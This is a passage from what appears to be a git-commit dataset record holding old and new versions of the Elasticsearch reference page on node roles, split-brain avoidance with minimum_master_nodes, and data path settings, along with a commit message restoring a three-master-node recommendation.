node.\n\nAny master-eligible node (all nodes by default) may be elected to become the\nmaster node by the <<modules-discovery-zen,master election process>>.\n\nIMPORTANT: Master nodes must have access to the `data\/` directory (just like\n`data` nodes) as this is where the cluster state is persisted between node restarts.\n\nIndexing and searching your data is CPU-, memory-, and I\/O-intensive work\nwhich can put pressure on a node's resources. To ensure that your master\nnode is stable and not under pressure, it is a good idea in a bigger\ncluster to split the roles between dedicated master-eligible nodes and\ndedicated data nodes.\n\nWhile master nodes can also behave as <<coordinating-node,coordinating nodes>>\nand route search and indexing requests from clients to data nodes, it is\nbetter _not_ to use dedicated master nodes for this purpose. It is important\nfor the stability of the cluster that master-eligible nodes do as little work\nas possible.\n\nTo create a dedicated master-eligible node, set:\n\n[source,yaml]\n-------------------\nnode.master: true <1>\nnode.data: false <2>\nnode.ingest: false <3>\nsearch.remote.connect: false <4>\n-------------------\n<1> The `node.master` role is enabled by default.\n<2> Disable the `node.data` role (enabled by default).\n<3> Disable the `node.ingest` role (enabled by default).\n<4> Disable cross-cluster search (enabled by default).\n\nifdef::include-xpack[]\nNOTE: These settings apply only when {xpack} is not installed. 
To create a\ndedicated master-eligible node when {xpack} is installed, see <<modules-node-xpack,{xpack} node settings>>.\nendif::include-xpack[]\n\n\n[float]\n[[split-brain]]\n==== Avoiding split brain with `minimum_master_nodes`\n\nTo prevent data loss, it is vital to configure the\n`discovery.zen.minimum_master_nodes` setting (which defaults to `1`) so that\neach master-eligible node knows the _minimum number of master-eligible nodes_\nthat must be visible in order to form a cluster.\n\nTo explain, imagine that you have a cluster consisting of two master-eligible\nnodes. A network failure breaks communication between these two nodes. Each\nnode sees one master-eligible node... itself. With `minimum_master_nodes` set\nto the default of `1`, this is sufficient to form a cluster. Each node elects\nitself as the new master (thinking that the other master-eligible node has\ndied) and the result is two clusters, or a _split brain_. These two nodes\nwill never rejoin until one node is restarted. Any data that has been written\nto the restarted node will be lost.\n\nNow imagine that you have a cluster with three master-eligible nodes, and\n`minimum_master_nodes` set to `2`. If a network split separates one node from\nthe other two nodes, the side with one node cannot see enough master-eligible\nnodes and will realise that it cannot elect itself as master. The side with\ntwo nodes will elect a new master (if needed) and continue functioning\ncorrectly. As soon as the network split is resolved, the single node will\nrejoin the cluster and start serving requests again.\n\nThis setting should be set to a _quorum_ of master-eligible nodes:\n\n (master_eligible_nodes \/ 2) + 1\n\nIn other words, if there are three master-eligible nodes, then minimum master\nnodes should be set to `(3 \/ 2) + 1` or `2`:\n\n[source,yaml]\n----------------------------\ndiscovery.zen.minimum_master_nodes: 2 <1>\n----------------------------\n<1> Defaults to `1`.\n\nThis setting can also be changed dynamically on a live cluster with the\n<<cluster-update-settings,cluster update settings API>>:\n\n[source,js]\n----------------------------\nPUT _cluster\/settings\n{\n \"transient\": {\n \"discovery.zen.minimum_master_nodes\": 2\n }\n}\n----------------------------\n\/\/ CONSOLE\n\/\/ TEST[catch:\/cannot set discovery.zen.minimum_master_nodes to more than the current master nodes\/]\n\nTIP: An advantage of splitting the master and data roles between dedicated\nnodes is that you can have just three master-eligible nodes and set\n`minimum_master_nodes` to `2`. You never have to change this setting, no\nmatter how many dedicated data nodes you add to the cluster.\n\n\n[float]\n[[data-node]]\n=== Data Node\n\nData nodes hold the shards that contain the documents you have indexed. Data\nnodes handle data related operations like CRUD, search, and aggregations.\nThese operations are I\/O-, memory-, and CPU-intensive. 
It is important to\nmonitor these resources and to add more data nodes if they are overloaded.\n\nThe main benefit of having dedicated data nodes is the separation of the\nmaster and data roles.\n\nTo create a dedicated data node, set:\n\n[source,yaml]\n-------------------\nnode.master: false <1>\nnode.data: true <2>\nnode.ingest: false <3>\nsearch.remote.connect: false <4>\n-------------------\n<1> Disable the `node.master` role (enabled by default).\n<2> The `node.data` role is enabled by default.\n<3> Disable the `node.ingest` role (enabled by default).\n<4> Disable cross-cluster search (enabled by default).\n\nifdef::include-xpack[]\nNOTE: These settings apply only when {xpack} is not installed. To create a\ndedicated data node when {xpack} is installed, see <<modules-node-xpack,{xpack} node settings>>.\nendif::include-xpack[]\n\n[float]\n[[node-ingest-node]]\n=== Ingest Node\n\nIngest nodes can execute pre-processing pipelines, composed of one or more\ningest processors. Depending on the type of operations performed by the ingest\nprocessors and the required resources, it may make sense to have dedicated\ningest nodes, that will only perform this specific task.\n\nTo create a dedicated ingest node, set:\n\n[source,yaml]\n-------------------\nnode.master: false <1>\nnode.data: false <2>\nnode.ingest: true <3>\nsearch.remote.connect: false <4>\n-------------------\n<1> Disable the `node.master` role (enabled by default).\n<2> Disable the `node.data` role (enabled by default).\n<3> The `node.ingest` role is enabled by default.\n<4> Disable cross-cluster search (enabled by default).\n\nifdef::include-xpack[]\nNOTE: These settings apply only when {xpack} is not installed. To create a\ndedicated ingest node when {xpack} is installed, see <<modules-node-xpack,{xpack} node settings>>.\nendif::include-xpack[]\n\n[float]\n[[coordinating-only-node]]\n=== Coordinating only node\n\nIf you take away the ability to be able to handle master duties, to hold data,\nand pre-process documents, then you are left with a _coordinating_ node that\ncan only route requests, handle the search reduce phase, and distribute bulk\nindexing. Essentially, coordinating only nodes behave as smart load balancers.\n\nCoordinating only nodes can benefit large clusters by offloading the\ncoordinating node role from data and master-eligible nodes. They join the\ncluster and receive the full <<cluster-state,cluster state>>, like every other\nnode, and they use the cluster state to route requests directly to the\nappropriate place(s).\n\nWARNING: Adding too many coordinating only nodes to a cluster can increase the\nburden on the entire cluster because the elected master node must await\nacknowledgement of cluster state updates from every node! The benefit of\ncoordinating only nodes should not be overstated -- data nodes can happily\nserve the same purpose.\n\nTo create a dedicated coordinating node, set:\n\n[source,yaml]\n-------------------\nnode.master: false <1>\nnode.data: false <2>\nnode.ingest: false <3>\nsearch.remote.connect: false <4>\n-------------------\n<1> Disable the `node.master` role (enabled by default).\n<2> Disable the `node.data` role (enabled by default).\n<3> Disable the `node.ingest` role (enabled by default).\n<4> Disable cross-cluster search (enabled by default).\n\nifdef::include-xpack[]\nNOTE: These settings apply only when {xpack} is not installed. 
To create a\ndedicated coordinating node when {xpack} is installed, see <<modules-node-xpack,{xpack} node settings>>.\nendif::include-xpack[]\n\n[float]\n== Node data path settings\n\n[float]\n[[data-path]]\n=== `path.data`\n\nEvery data and master-eligible node requires access to a data directory where\nshards and index and cluster metadata will be stored. The `path.data` defaults\nto `$ES_HOME\/data` but can be configured in the `elasticsearch.yml` config\nfile an absolute path or a path relative to `$ES_HOME` as follows:\n\n[source,yaml]\n-----------------------\npath.data: \/var\/elasticsearch\/data\n-----------------------\n\nLike all node settings, it can also be specified on the command line as:\n\n[source,sh]\n-----------------------\n.\/bin\/elasticsearch -Epath.data=\/var\/elasticsearch\/data\n-----------------------\n\nTIP: When using the `.zip` or `.tar.gz` distributions, the `path.data` setting\nshould be configured to locate the data directory outside the Elasticsearch\nhome directory, so that the home directory can be deleted without deleting\nyour data! The RPM and Debian distributions do this for you already.\n\n\n[float]\n[[max-local-storage-nodes]]\n=== `node.max_local_storage_nodes`\n\nThe <<data-path,data path>> can be shared by multiple nodes, even by nodes from different\nclusters. This is very useful for testing failover and different configurations on your development\nmachine. In production, however, it is recommended to run only one node of Elasticsearch per server.\n\nBy default, Elasticsearch is configured to prevent more than one node from sharing the same data\npath. To allow for more than one node (e.g., on your development machine), use the setting\n`node.max_local_storage_nodes` and set this to a positive integer larger than one.\n\nWARNING: Never run different node types (i.e. master, data) from the same data directory. This can\nlead to unexpected data loss.\n\n[float]\n== Other node settings\n\nMore node settings can be found in <<modules,Modules>>. Of particular note are\nthe <<cluster.name,`cluster.name`>>, the <<node.name,`node.name`>> and the\n<<modules-network,network settings>>.\n\nifdef::include-xpack[]\n:edit_url!:\ninclude::{xes-repo-dir}\/node.asciidoc[]\nendif::include-xpack[]\n","old_contents":"[[modules-node]]\n== Node\n\nAny time that you start an instance of Elasticsearch, you are starting a\n_node_. A collection of connected nodes is called a\n<<modules-cluster,cluster>>. If you are running a single node of Elasticsearch,\nthen you have a cluster of one node.\n\nEvery node in the cluster can handle <<modules-http,HTTP>> and\n<<modules-transport,Transport>> traffic by default. The transport layer\nis used exclusively for communication between nodes and the\n{javaclient}\/transport-client.html[Java `TransportClient`]; the HTTP layer is\nused only by external REST clients.\n\nAll nodes know about all the other nodes in the cluster and can forward client\nrequests to the appropriate node. Besides that, each node serves one or more\npurpose:\n\n<<master-node,Master-eligible node>>::\n\nA node that has `node.master` set to `true` (default), which makes it eligible\nto be <<modules-discovery-zen,elected as the _master_ node>>, which controls\nthe cluster.\n\n<<data-node,Data node>>::\n\nA node that has `node.data` set to `true` (default). Data nodes hold data and\nperform data related operations such as CRUD, search, and aggregations.\n\n<<ingest,Ingest node>>::\n\nA node that has `node.ingest` set to `true` (default). 
Ingest nodes are able\nto apply an <<pipeline,ingest pipeline>> to a document in order to transform\nand enrich the document before indexing. With a heavy ingest load, it makes\nsense to use dedicated ingest nodes and to mark the master and data nodes as\n`node.ingest: false`.\n\n<<modules-tribe,Tribe node>>::\n\nA tribe node, configured via the `tribe.*` settings, is a special type of\ncoordinating only node that can connect to multiple clusters and perform\nsearch and other operations across all connected clusters.\n\nBy default a node is a master-eligible node and a data node, plus it can\npre-process documents through ingest pipelines. This is very convenient for\nsmall clusters but, as the cluster grows, it becomes important to consider\nseparating dedicated master-eligible nodes from dedicated data nodes.\n\n[NOTE]\n[[coordinating-node]]\n.Coordinating node\n===============================================\n\nRequests like search requests or bulk-indexing requests may involve data held\non different data nodes. A search request, for example, is executed in two\nphases which are coordinated by the node which receives the client request --\nthe _coordinating node_.\n\nIn the _scatter_ phase, the coordinating node forwards the request to the data\nnodes which hold the data. Each data node executes the request locally and\nreturns its results to the coordinating node. In the _gather_ phase, the\ncoordinating node reduces each data node's results into a single global\nresultset.\n\nEvery node is implicitly a coordinating node. This means that a node that has\nall three `node.master`, `node.data` and `node.ingest` set to `false` will\nonly act as a coordinating node, which cannot be disabled. As a result, such\na node needs to have enough memory and CPU in order to deal with the gather\nphase.\n\n===============================================\n\n[float]\n[[master-node]]\n=== Master Eligible Node\n\nThe master node is responsible for lightweight cluster-wide actions such as\ncreating or deleting an index, tracking which nodes are part of the cluster,\nand deciding which shards to allocate to which nodes. It is important for\ncluster health to have a stable master node.\n\nAny master-eligible node (all nodes by default) may be elected to become the\nmaster node by the <<modules-discovery-zen,master election process>>.\n\nIMPORTANT: Master nodes must have access to the `data\/` directory (just like\n`data` nodes) as this is where the cluster state is persisted between node restarts.\n\nIndexing and searching your data is CPU-, memory-, and I\/O-intensive work\nwhich can put pressure on a node's resources. To ensure that your master\nnode is stable and not under pressure, it is a good idea in a bigger\ncluster to split the roles between dedicated master-eligible nodes and\ndedicated data nodes.\n\nWhile master nodes can also behave as <<coordinating-node,coordinating nodes>>\nand route search and indexing requests from clients to data nodes, it is\nbetter _not_ to use dedicated master nodes for this purpose. 
It is important\nfor the stability of the cluster that master-eligible nodes do as little work\nas possible.\n\nTo create a dedicated master-eligible node, set:\n\n[source,yaml]\n-------------------\nnode.master: true <1>\nnode.data: false <2>\nnode.ingest: false <3>\n-------------------\n<1> The `node.master` role is enabled by default.\n<2> Disable the `node.data` role (enabled by default).\n<3> Disable the `node.ingest` role (enabled by default).\n\nifdef::include-xpack[]\nNOTE: These settings apply only when {xpack} is not installed. To create a\ndedicated master-eligible node when {xpack} is installed, see <<modules-node-xpack,{xpack} node settings>>.\nendif::include-xpack[]\n\n\n[float]\n[[split-brain]]\n==== Avoiding split brain with `minimum_master_nodes`\n\nTo prevent data loss, it is vital to configure the\n`discovery.zen.minimum_master_nodes` setting (which defaults to `1`) so that\neach master-eligible node knows the _minimum number of master-eligible nodes_\nthat must be visible in order to form a cluster.\n\nTo explain, imagine that you have a cluster consisting of two master-eligible\nnodes. A network failure breaks communication between these two nodes. Each\nnode sees one master-eligible node... itself. With `minimum_master_nodes` set\nto the default of `1`, this is sufficient to form a cluster. Each node elects\nitself as the new master (thinking that the other master-eligible node has\ndied) and the result is two clusters, or a _split brain_. These two nodes\nwill never rejoin until one node is restarted. Any data that has been written\nto the restarted node will be lost.\n\nNow imagine that you have a cluster with three master-eligible nodes, and\n`minimum_master_nodes` set to `2`. If a network split separates one node from\nthe other two nodes, the side with one node cannot see enough master-eligible\nnodes and will realise that it cannot elect itself as master. The side with\ntwo nodes will elect a new master (if needed) and continue functioning\ncorrectly. As soon as the network split is resolved, the single node will\nrejoin the cluster and start serving requests again.\n\nThis setting should be set to a _quorum_ of master-eligible nodes:\n\n (master_eligible_nodes \/ 2) + 1\n\nIn other words, if there are three master-eligible nodes, then minimum master\nnodes should be set to `(3 \/ 2) + 1` or `2`:\n\n[source,yaml]\n----------------------------\ndiscovery.zen.minimum_master_nodes: 2 <1>\n----------------------------\n<1> Defaults to `1`.\n\nThis setting can also be changed dynamically on a live cluster with the\n<<cluster-update-settings,cluster update settings API>>:\n\n[source,js]\n----------------------------\nPUT _cluster\/settings\n{\n \"transient\": {\n \"discovery.zen.minimum_master_nodes\": 2\n }\n}\n----------------------------\n\/\/ CONSOLE\n\/\/ TEST[catch:\/cannot set discovery.zen.minimum_master_nodes to more than the current master nodes\/]\n\nTIP: An advantage of splitting the master and data roles between dedicated\nnodes is that you can have just three master-eligible nodes and set\n`minimum_master_nodes` to `2`. You never have to change this setting, no\nmatter how many dedicated data nodes you add to the cluster.\n\n\n[float]\n[[data-node]]\n=== Data Node\n\nData nodes hold the shards that contain the documents you have indexed. Data\nnodes handle data related operations like CRUD, search, and aggregations.\nThese operations are I\/O-, memory-, and CPU-intensive. 
It is important to\nmonitor these resources and to add more data nodes if they are overloaded.\n\nThe main benefit of having dedicated data nodes is the separation of the\nmaster and data roles.\n\nTo create a dedicated data node, set:\n\n[source,yaml]\n-------------------\nnode.master: false <1>\nnode.data: true <2>\nnode.ingest: false <3>\n-------------------\n<1> Disable the `node.master` role (enabled by default).\n<2> The `node.data` role is enabled by default.\n<3> Disable the `node.ingest` role (enabled by default).\n\nifdef::include-xpack[]\nNOTE: These settings apply only when {xpack} is not installed. To create a\ndedicated data node when {xpack} is installed, see <<modules-node-xpack,{xpack} node settings>>.\nendif::include-xpack[]\n\n[float]\n[[node-ingest-node]]\n=== Ingest Node\n\nIngest nodes can execute pre-processing pipelines, composed of one or more\ningest processors. Depending on the type of operations performed by the ingest\nprocessors and the required resources, it may make sense to have dedicated\ningest nodes, that will only perform this specific task.\n\nTo create a dedicated ingest node, set:\n\n[source,yaml]\n-------------------\nnode.master: false <1>\nnode.data: false <2>\nnode.ingest: true <3>\nsearch.remote.connect: false <4>\n-------------------\n<1> Disable the `node.master` role (enabled by default).\n<2> Disable the `node.data` role (enabled by default).\n<3> The `node.ingest` role is enabled by default.\n<4> Disable cross-cluster search (enabled by default).\n\nifdef::include-xpack[]\nNOTE: These settings apply only when {xpack} is not installed. To create a\ndedicated ingest node when {xpack} is installed, see <<modules-node-xpack,{xpack} node settings>>.\nendif::include-xpack[]\n\n[float]\n[[coordinating-only-node]]\n=== Coordinating only node\n\nIf you take away the ability to be able to handle master duties, to hold data,\nand pre-process documents, then you are left with a _coordinating_ node that\ncan only route requests, handle the search reduce phase, and distribute bulk\nindexing. Essentially, coordinating only nodes behave as smart load balancers.\n\nCoordinating only nodes can benefit large clusters by offloading the\ncoordinating node role from data and master-eligible nodes. They join the\ncluster and receive the full <<cluster-state,cluster state>>, like every other\nnode, and they use the cluster state to route requests directly to the\nappropriate place(s).\n\nWARNING: Adding too many coordinating only nodes to a cluster can increase the\nburden on the entire cluster because the elected master node must await\nacknowledgement of cluster state updates from every node! The benefit of\ncoordinating only nodes should not be overstated -- data nodes can happily\nserve the same purpose.\n\nTo create a dedicated coordinating node, set:\n\n[source,yaml]\n-------------------\nnode.master: false <1>\nnode.data: false <2>\nnode.ingest: false <3>\nsearch.remote.connect: false <4>\n-------------------\n<1> Disable the `node.master` role (enabled by default).\n<2> Disable the `node.data` role (enabled by default).\n<3> Disable the `node.ingest` role (enabled by default).\n<4> Disable cross-cluster search (enabled by default).\n\nifdef::include-xpack[]\nNOTE: These settings apply only when {xpack} is not installed. 
To create a\ndedicated coordinating node when {xpack} is installed, see <<modules-node-xpack,{xpack} node settings>>.\nendif::include-xpack[]\n\n[float]\n== Node data path settings\n\n[float]\n[[data-path]]\n=== `path.data`\n\nEvery data and master-eligible node requires access to a data directory where\nshards and index and cluster metadata will be stored. The `path.data` defaults\nto `$ES_HOME\/data` but can be configured in the `elasticsearch.yml` config\nfile an absolute path or a path relative to `$ES_HOME` as follows:\n\n[source,yaml]\n-----------------------\npath.data: \/var\/elasticsearch\/data\n-----------------------\n\nLike all node settings, it can also be specified on the command line as:\n\n[source,sh]\n-----------------------\n.\/bin\/elasticsearch -Epath.data=\/var\/elasticsearch\/data\n-----------------------\n\nTIP: When using the `.zip` or `.tar.gz` distributions, the `path.data` setting\nshould be configured to locate the data directory outside the Elasticsearch\nhome directory, so that the home directory can be deleted without deleting\nyour data! The RPM and Debian distributions do this for you already.\n\n\n[float]\n[[max-local-storage-nodes]]\n=== `node.max_local_storage_nodes`\n\nThe <<data-path,data path>> can be shared by multiple nodes, even by nodes from different\nclusters. This is very useful for testing failover and different configurations on your development\nmachine. In production, however, it is recommended to run only one node of Elasticsearch per server.\n\nBy default, Elasticsearch is configured to prevent more than one node from sharing the same data\npath. To allow for more than one node (e.g., on your development machine), use the setting\n`node.max_local_storage_nodes` and set this to a positive integer larger than one.\n\nWARNING: Never run different node types (i.e. master, data) from the same data directory. This can\nlead to unexpected data loss.\n\n[float]\n== Other node settings\n\nMore node settings can be found in <<modules,Modules>>. Of particular note are\nthe <<cluster.name,`cluster.name`>>, the <<node.name,`node.name`>> and the\n<<modules-network,network settings>>.\n\nifdef::include-xpack[]\n:edit_url!:\ninclude::{xes-repo-dir}\/node.asciidoc[]\nendif::include-xpack[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b2c7471b755f9e5d3e89369e42538618b9e35b0c","subject":"Reinstate recommendation for \u2265 3 master-eligible nodes. (#27204)","message":"Reinstate recommendation for \u2265 3 master-eligible nodes. (#27204)\n\nIn the docs for 1.7 ([doc][doc-1.7], [src][src-1.7]) there was a recommendation\r\nfor at least 3 master-eligible nodes \"in critical clusters\" but this was lost\r\nwhen that page was updated in 2.0 ([doc][doc-2.0], [src][src-2.0]). 
I'd like to\r\nreinstate this.\r\n\r\n[doc-1.7]: https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/1.7\/modules-node.html\r\n[src-1.7]: https:\/\/github.com\/elastic\/elasticsearch\/blob\/2cbaccb2f2a495923bc64447fe3396e0fc58b3d3\/docs\/reference\/modules\/node.asciidoc\r\n[doc-2.0]: https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/2.0\/modules-node.html#split-brain\r\n[src-2.0]: https:\/\/github.com\/elastic\/elasticsearch\/blob\/4799009ad7ea8f885b6aedc6f62ad61d69e7a40d\/docs\/reference\/modules\/node.asciidoc\r\n","repos":"vroyer\/elasticassandra,vroyer\/elasticassandra,vroyer\/elassandra,vroyer\/elassandra,strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra,vroyer\/elasticassandra,vroyer\/elassandra,strapdata\/elassandra,strapdata\/elassandra","old_file":"docs\/reference\/modules\/node.asciidoc","new_file":"docs\/reference\/modules\/node.asciidoc","new_contents":"[[modules-node]]\n== Node\n\nAny time that you start an instance of Elasticsearch, you are starting a\n_node_. A collection of connected nodes is called a\n<<modules-cluster,cluster>>. If you are running a single node of Elasticsearch,\nthen you have a cluster of one node.\n\nEvery node in the cluster can handle <<modules-http,HTTP>> and\n<<modules-transport,Transport>> traffic by default. The transport layer\nis used exclusively for communication between nodes and the\n{javaclient}\/transport-client.html[Java `TransportClient`]; the HTTP layer is\nused only by external REST clients.\n\nAll nodes know about all the other nodes in the cluster and can forward client\nrequests to the appropriate node. Besides that, each node serves one or more\npurpose:\n\n<<master-node,Master-eligible node>>::\n\nA node that has `node.master` set to `true` (default), which makes it eligible\nto be <<modules-discovery-zen,elected as the _master_ node>>, which controls\nthe cluster.\n\n<<data-node,Data node>>::\n\nA node that has `node.data` set to `true` (default). Data nodes hold data and\nperform data related operations such as CRUD, search, and aggregations.\n\n<<ingest,Ingest node>>::\n\nA node that has `node.ingest` set to `true` (default). Ingest nodes are able\nto apply an <<pipeline,ingest pipeline>> to a document in order to transform\nand enrich the document before indexing. With a heavy ingest load, it makes\nsense to use dedicated ingest nodes and to mark the master and data nodes as\n`node.ingest: false`.\n\n<<modules-tribe,Tribe node>>::\n\nA tribe node, configured via the `tribe.*` settings, is a special type of\ncoordinating only node that can connect to multiple clusters and perform\nsearch and other operations across all connected clusters.\n\nBy default a node is a master-eligible node and a data node, plus it can\npre-process documents through ingest pipelines. This is very convenient for\nsmall clusters but, as the cluster grows, it becomes important to consider\nseparating dedicated master-eligible nodes from dedicated data nodes.\n\n[NOTE]\n[[coordinating-node]]\n.Coordinating node\n===============================================\n\nRequests like search requests or bulk-indexing requests may involve data held\non different data nodes. A search request, for example, is executed in two\nphases which are coordinated by the node which receives the client request --\nthe _coordinating node_.\n\nIn the _scatter_ phase, the coordinating node forwards the request to the data\nnodes which hold the data. 
Each data node executes the request locally and\nreturns its results to the coordinating node. In the _gather_ phase, the\ncoordinating node reduces each data node's results into a single global\nresultset.\n\nEvery node is implicitly a coordinating node. This means that a node that has\nall three `node.master`, `node.data` and `node.ingest` set to `false` will\nonly act as a coordinating node, which cannot be disabled. As a result, such\na node needs to have enough memory and CPU in order to deal with the gather\nphase.\n\n===============================================\n\n[float]\n[[master-node]]\n=== Master Eligible Node\n\nThe master node is responsible for lightweight cluster-wide actions such as\ncreating or deleting an index, tracking which nodes are part of the cluster,\nand deciding which shards to allocate to which nodes. It is important for\ncluster health to have a stable master node.\n\nAny master-eligible node (all nodes by default) may be elected to become the\nmaster node by the <<modules-discovery-zen,master election process>>.\n\nIMPORTANT: Master nodes must have access to the `data\/` directory (just like\n`data` nodes) as this is where the cluster state is persisted between node restarts.\n\nIndexing and searching your data is CPU-, memory-, and I\/O-intensive work\nwhich can put pressure on a node's resources. To ensure that your master\nnode is stable and not under pressure, it is a good idea in a bigger\ncluster to split the roles between dedicated master-eligible nodes and\ndedicated data nodes.\n\nWhile master nodes can also behave as <<coordinating-node,coordinating nodes>>\nand route search and indexing requests from clients to data nodes, it is\nbetter _not_ to use dedicated master nodes for this purpose. It is important\nfor the stability of the cluster that master-eligible nodes do as little work\nas possible.\n\nTo create a dedicated master-eligible node, set:\n\n[source,yaml]\n-------------------\nnode.master: true <1>\nnode.data: false <2>\nnode.ingest: false <3>\nsearch.remote.connect: false <4>\n-------------------\n<1> The `node.master` role is enabled by default.\n<2> Disable the `node.data` role (enabled by default).\n<3> Disable the `node.ingest` role (enabled by default).\n<4> Disable cross-cluster search (enabled by default).\n\nifdef::include-xpack[]\nNOTE: These settings apply only when {xpack} is not installed. To create a\ndedicated master-eligible node when {xpack} is installed, see <<modules-node-xpack,{xpack} node settings>>.\nendif::include-xpack[]\n\n\n[float]\n[[split-brain]]\n==== Avoiding split brain with `minimum_master_nodes`\n\nTo prevent data loss, it is vital to configure the\n`discovery.zen.minimum_master_nodes` setting (which defaults to `1`) so that\neach master-eligible node knows the _minimum number of master-eligible nodes_\nthat must be visible in order to form a cluster.\n\nTo explain, imagine that you have a cluster consisting of two master-eligible\nnodes. A network failure breaks communication between these two nodes. Each\nnode sees one master-eligible node... itself. With `minimum_master_nodes` set\nto the default of `1`, this is sufficient to form a cluster. Each node elects\nitself as the new master (thinking that the other master-eligible node has\ndied) and the result is two clusters, or a _split brain_. These two nodes\nwill never rejoin until one node is restarted. 
Any data that has been written\nto the restarted node will be lost.\n\nNow imagine that you have a cluster with three master-eligible nodes, and\n`minimum_master_nodes` set to `2`. If a network split separates one node from\nthe other two nodes, the side with one node cannot see enough master-eligible\nnodes and will realise that it cannot elect itself as master. The side with\ntwo nodes will elect a new master (if needed) and continue functioning\ncorrectly. As soon as the network split is resolved, the single node will\nrejoin the cluster and start serving requests again.\n\nThis setting should be set to a _quorum_ of master-eligible nodes:\n\n (master_eligible_nodes \/ 2) + 1\n\nIn other words, if there are three master-eligible nodes, then minimum master\nnodes should be set to `(3 \/ 2) + 1` or `2`:\n\n[source,yaml]\n----------------------------\ndiscovery.zen.minimum_master_nodes: 2 <1>\n----------------------------\n<1> Defaults to `1`.\n\nTo be able to remain available when one of the master-eligible nodes fails,\nclusters should have at least three master-eligible nodes, with\n`minimum_master_nodes` set accordingly. A <<rolling-upgrades,rolling upgrade>>,\nperformed without any downtime, also requires at least three master-eligible\nnodes to avoid the possibility of data loss if a network split occurs while the\nupgrade is in progress.\n\nThis setting can also be changed dynamically on a live cluster with the\n<<cluster-update-settings,cluster update settings API>>:\n\n[source,js]\n----------------------------\nPUT _cluster\/settings\n{\n \"transient\": {\n \"discovery.zen.minimum_master_nodes\": 2\n }\n}\n----------------------------\n\/\/ CONSOLE\n\/\/ TEST[catch:\/cannot set discovery.zen.minimum_master_nodes to more than the current master nodes\/]\n\nTIP: An advantage of splitting the master and data roles between dedicated\nnodes is that you can have just three master-eligible nodes and set\n`minimum_master_nodes` to `2`. You never have to change this setting, no\nmatter how many dedicated data nodes you add to the cluster.\n\n\n[float]\n[[data-node]]\n=== Data Node\n\nData nodes hold the shards that contain the documents you have indexed. Data\nnodes handle data related operations like CRUD, search, and aggregations.\nThese operations are I\/O-, memory-, and CPU-intensive. It is important to\nmonitor these resources and to add more data nodes if they are overloaded.\n\nThe main benefit of having dedicated data nodes is the separation of the\nmaster and data roles.\n\nTo create a dedicated data node, set:\n\n[source,yaml]\n-------------------\nnode.master: false <1>\nnode.data: true <2>\nnode.ingest: false <3>\nsearch.remote.connect: false <4>\n-------------------\n<1> Disable the `node.master` role (enabled by default).\n<2> The `node.data` role is enabled by default.\n<3> Disable the `node.ingest` role (enabled by default).\n<4> Disable cross-cluster search (enabled by default).\n\nifdef::include-xpack[]\nNOTE: These settings apply only when {xpack} is not installed. To create a\ndedicated data node when {xpack} is installed, see <<modules-node-xpack,{xpack} node settings>>.\nendif::include-xpack[]\n\n[float]\n[[node-ingest-node]]\n=== Ingest Node\n\nIngest nodes can execute pre-processing pipelines, composed of one or more\ningest processors. 
Depending on the type of operations performed by the ingest\nprocessors and the required resources, it may make sense to have dedicated\ningest nodes, that will only perform this specific task.\n\nTo create a dedicated ingest node, set:\n\n[source,yaml]\n-------------------\nnode.master: false <1>\nnode.data: false <2>\nnode.ingest: true <3>\nsearch.remote.connect: false <4>\n-------------------\n<1> Disable the `node.master` role (enabled by default).\n<2> Disable the `node.data` role (enabled by default).\n<3> The `node.ingest` role is enabled by default.\n<4> Disable cross-cluster search (enabled by default).\n\nifdef::include-xpack[]\nNOTE: These settings apply only when {xpack} is not installed. To create a\ndedicated ingest node when {xpack} is installed, see <<modules-node-xpack,{xpack} node settings>>.\nendif::include-xpack[]\n\n[float]\n[[coordinating-only-node]]\n=== Coordinating only node\n\nIf you take away the ability to be able to handle master duties, to hold data,\nand pre-process documents, then you are left with a _coordinating_ node that\ncan only route requests, handle the search reduce phase, and distribute bulk\nindexing. Essentially, coordinating only nodes behave as smart load balancers.\n\nCoordinating only nodes can benefit large clusters by offloading the\ncoordinating node role from data and master-eligible nodes. They join the\ncluster and receive the full <<cluster-state,cluster state>>, like every other\nnode, and they use the cluster state to route requests directly to the\nappropriate place(s).\n\nWARNING: Adding too many coordinating only nodes to a cluster can increase the\nburden on the entire cluster because the elected master node must await\nacknowledgement of cluster state updates from every node! The benefit of\ncoordinating only nodes should not be overstated -- data nodes can happily\nserve the same purpose.\n\nTo create a dedicated coordinating node, set:\n\n[source,yaml]\n-------------------\nnode.master: false <1>\nnode.data: false <2>\nnode.ingest: false <3>\nsearch.remote.connect: false <4>\n-------------------\n<1> Disable the `node.master` role (enabled by default).\n<2> Disable the `node.data` role (enabled by default).\n<3> Disable the `node.ingest` role (enabled by default).\n<4> Disable cross-cluster search (enabled by default).\n\nifdef::include-xpack[]\nNOTE: These settings apply only when {xpack} is not installed. To create a\ndedicated coordinating node when {xpack} is installed, see <<modules-node-xpack,{xpack} node settings>>.\nendif::include-xpack[]\n\n[float]\n== Node data path settings\n\n[float]\n[[data-path]]\n=== `path.data`\n\nEvery data and master-eligible node requires access to a data directory where\nshards and index and cluster metadata will be stored. The `path.data` defaults\nto `$ES_HOME\/data` but can be configured in the `elasticsearch.yml` config\nfile an absolute path or a path relative to `$ES_HOME` as follows:\n\n[source,yaml]\n-----------------------\npath.data: \/var\/elasticsearch\/data\n-----------------------\n\nLike all node settings, it can also be specified on the command line as:\n\n[source,sh]\n-----------------------\n.\/bin\/elasticsearch -Epath.data=\/var\/elasticsearch\/data\n-----------------------\n\nTIP: When using the `.zip` or `.tar.gz` distributions, the `path.data` setting\nshould be configured to locate the data directory outside the Elasticsearch\nhome directory, so that the home directory can be deleted without deleting\nyour data! 
